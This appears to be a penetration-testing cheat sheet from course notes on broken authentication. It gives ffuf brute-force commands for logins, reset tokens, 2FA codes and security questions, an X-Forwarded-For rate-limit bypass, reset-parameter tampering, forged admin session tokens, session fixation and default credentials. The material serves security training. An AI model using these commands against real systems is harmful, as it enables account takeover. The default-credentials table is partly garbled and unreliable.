Broken Authentication

User Enumeration

Identify

Different error messages for valid vs invalid usernames
"Unknown user" vs "Invalid password"
Response timing differences

Exploit - ffuf User Enumeration

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
     -u http://TARGET/index.php \
     -X POST \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -d "username=FUZZ&password=invalid" \
     -fr "Unknown user"

Password Brute Force

Filter Wordlist by Password Policy

# grep method - filter for: uppercase, lowercase, digit, min 10 chars
grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt

# awk method - same filter
awk 'length($0) >= 10 && /[a-z]/ && /[A-Z]/ && /[0-9]/' rockyou.txt > custom_wordlist.txt

Exploit - ffuf Password Brute Force

ffuf -w ./custom_wordlist.txt \
     -u http://TARGET/index.php \
     -X POST \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -d "username=admin&password=FUZZ" \
     -fr "Invalid username"

Password Reset Token Brute Force

Identify

Short numeric token (4-6 digits)
Token in URL: ?token=7351
No rate limiting

Generate Token Wordlist

# 4-digit tokens (0000-9999)
seq -w 0 9999 > tokens.txt

# 6-digit tokens
seq -w 0 999999 > tokens.txt

Exploit - ffuf Reset Token Brute Force

ffuf -w ./tokens.txt \
     -u "http://TARGET/reset_password.php?token=FUZZ" \
     -fr "The provided token is invalid"

2FA Bypass

Identify

Short OTP (4-6 digits)
No lockout after failed attempts
No rate limiting

Exploit - ffuf 2FA Brute Force

# Generate OTP wordlist
seq -w 0 9999 > tokens.txt

# Brute force (include session cookie!)
ffuf -w ./tokens.txt \
     -u http://TARGET/2fa.php \
     -X POST \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -b "PHPSESSID=YOUR_SESSION_COOKIE" \
     -d "otp=FUZZ" \
     -fr "Invalid 2FA Code"

Rate Limit Bypass

Identify

Rate limit uses X-Forwarded-For header
CVE-2020-35590 pattern

Exploit - Randomize X-Forwarded-For

# Add random IP to each request
ffuf -w passwords.txt \
     -u http://TARGET/login \
     -X POST \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -H "X-Forwarded-For: FUZZ2" \
     -d "username=admin&password=FUZZ" \
     -w <(for i in $(seq 1 10000); do echo "10.0.0.$((RANDOM % 255))"; done):FUZZ2

Security Question Brute Force

Identify

Predictable questions: "What city were you born in?"
No rate limiting on answers

Create City Wordlist

# From world-cities.csv
cat world-cities.csv | cut -d ',' -f1 > city_wordlist.txt

# Filter by country (Germany)
cat world-cities.csv | grep Germany | cut -d ',' -f1 > german_cities.txt

Exploit - ffuf Security Question Brute Force

ffuf -w ./city_wordlist.txt \
     -u http://TARGET/security_question.php \
     -X POST \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -b "PHPSESSID=YOUR_SESSION_COOKIE" \
     -d "security_response=FUZZ" \
     -fr "Incorrect response"

Password Reset Manipulation

Identify

Hidden username parameter in reset form
Username passed through all reset steps

Exploit - Change Username in Final Request

POST /reset_password.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xxx

password=NewP@ss123&username=admin

Answer YOUR security question → change username to victim in final step.

Authentication Bypass - Direct Access

Identify

Protected page returns 302 redirect but body contains content
Missing exit; after redirect

Exploit - Burp Response Modification

Intercept → Do intercept → Response to this request
Change 302 Found to 200 OK
Forward response → page renders

Exploit - curl

# View response body despite redirect
curl -i http://TARGET/admin.php

Authentication Bypass - Parameter Modification

Identify

user_id parameter in URL after login
Removing parameter causes redirect
Sequential/guessable IDs

Exploit

# Access as different user
curl "http://TARGET/admin.php?user_id=1"

# Brute force user IDs
ffuf -w <(seq 1 1000) \
     -u "http://TARGET/admin.php?user_id=FUZZ" \
     -fr "Could not load"

Session Token Attacks

Identify Weak Tokens

Short length (< 16 chars)
Sequential/incrementing
Static portions with small random part
Base64/hex encoded data

Decode Session Tokens

# Base64
echo -n 'dXNlcj1odGItc3RkbnQ7cm9sZT11c2Vy' | base64 -d
# user=htb-stdnt;role=user

# Hex
echo -n '757365723d6874622d7374646e743b726f6c653d75736572' | xxd -r -p
# user=htb-stdnt;role=user

Forge Admin Token

# Base64
echo -n 'user=htb-stdnt;role=admin' | base64
# dXNlcj1odGItc3RkbnQ7cm9sZT1hZG1pbg==

# Hex  
echo -n 'user=htb-stdnt;role=admin' | xxd -p
# 757365723d6874622d7374646e743b726f6c653d61646d696e

Session Fixation

Identify

Session token set via URL parameter (?sid=xxx)
Session not regenerated after login

Exploit

Get valid session: a1b2c3d4e5f6
Send victim: http://TARGET/?sid=a1b2c3d4e5f6
Victim logs in with your session
Use session=a1b2c3d4e5f6 to hijack

Default Credentials

Resources

https://www.cirt.net/passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
https://github.com/scadastrangelove/SCADAPASS

Common Defaults

App

Username

Password

WordPress

admin

BookStack

[email protected]

password

Tomcat

tomcat

Jenkins

admin

phpMyAdmin

root

(empty)

Search

# Google dork
site:github.com "default credentials" <app_name>

PreviousGraphQL Attacks NextBug Bounty Hunting

Last updated 4 days ago

hashtagUser Enumeration

hashtagIdentify

hashtagExploit - ffuf User Enumeration

hashtagPassword Brute Force

hashtagFilter Wordlist by Password Policy

hashtagExploit - ffuf Password Brute Force

hashtagPassword Reset Token Brute Force

hashtagIdentify

hashtagGenerate Token Wordlist

hashtagExploit - ffuf Reset Token Brute Force

hashtag2FA Bypass

hashtagIdentify

hashtagExploit - ffuf 2FA Brute Force

hashtagRate Limit Bypass

hashtagIdentify

hashtagExploit - Randomize X-Forwarded-For

hashtagSecurity Question Brute Force

hashtagIdentify

hashtagCreate City Wordlist

hashtagExploit - ffuf Security Question Brute Force

hashtagPassword Reset Manipulation

hashtagIdentify

hashtagExploit - Change Username in Final Request

hashtagAuthentication Bypass - Direct Access

hashtagIdentify

hashtagExploit - Burp Response Modification

hashtagExploit - curl

hashtagAuthentication Bypass - Parameter Modification

hashtagIdentify

hashtagExploit

hashtagSession Token Attacks

hashtagIdentify Weak Tokens

hashtagDecode Session Tokens

hashtagForge Admin Token

hashtagSession Fixation

hashtagIdentify

hashtagExploit

hashtagDefault Credentials

hashtagResources

hashtagCommon Defaults

hashtagSearch

User Enumeration

Identify

Exploit - ffuf User Enumeration

Password Brute Force

Filter Wordlist by Password Policy

Exploit - ffuf Password Brute Force

Password Reset Token Brute Force

Identify

Generate Token Wordlist

Exploit - ffuf Reset Token Brute Force

2FA Bypass

Identify

Exploit - ffuf 2FA Brute Force

Rate Limit Bypass

Identify

Exploit - Randomize X-Forwarded-For

Security Question Brute Force

Identify

Create City Wordlist

Exploit - ffuf Security Question Brute Force

Password Reset Manipulation

Identify

Exploit - Change Username in Final Request

Authentication Bypass - Direct Access

Identify

Exploit - Burp Response Modification

Exploit - curl

Authentication Bypass - Parameter Modification

Identify

Exploit

Session Token Attacks

Identify Weak Tokens

Decode Session Tokens

Forge Admin Token

Session Fixation

Identify

Exploit

Default Credentials

Resources

Common Defaults

Search